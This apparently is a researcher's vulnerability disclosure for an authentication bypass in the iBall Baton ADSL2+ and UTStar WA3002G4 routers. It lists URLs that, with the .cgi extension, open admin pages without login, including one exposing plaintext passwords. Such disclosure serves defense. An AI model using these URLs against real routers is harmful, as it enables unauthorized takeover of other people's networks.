iBall Baton ADSL2+ Home Router, UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass
Hi, I hope you have already gone through my first router exploitation writing Exploiting Router Authentication through Web Interface (CVE-2017-6558). Once again researching in router exploitation, I found similar bug in two other products iBall Baton ADSL2+ Home Router & UTStar WA3002G4 ADSL Broadband Modem that allowed me to bypass admin panel authentication. Both of these products are from two different vendors, but the vulnerability is same.
I was looking to find some methods to bypass authentication of commonly using routers in my country. First I came to open iBall Baton ADSL2+ Home Router admin page. The admin panel is protected by password authentication. I know some routers use CGI scripts like PayPal use in their websites. I tried to access common pages in the router by appending .cgi at the end of URL. Luckily I got the page info.cgi opened without asking authentication. I got few other pages also which can be accessed in the same way.
Steps
- Suppose 192.168.1.1 is the router IP, then the password reset page is http://192.168.1.1/password.html by default
- This page is a protected page which can be bypassed by changing URL extension as http://192.168.1.1/password.cgi
In the case of UTStar, the source code of password.cgi page contains the usernames and corresponding passwords in plain text. We can use this password to login admin panel!
Some pages we can directly access:
- http://192.168.1.1/info.cgi – Status and details
- http://192.168.1.1/upload.cgi – Firmware Upgrade
- http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
- http://192.168.1.1/pppoe.cgi – PPPoE settings
- http://192.168.1.1/resetrouter.cgi – Router reset
- http://192.168.1.1/password.cgi – password settings
Products Affected
- UTStar WA3002G4 ADSL Broadband Modem – Firmware Version: WA3002G4-0021.01
- iBall Baton ADSL2+ Home Router – Firmware version: FW_iB-LR7011A_1.0.2
Gem George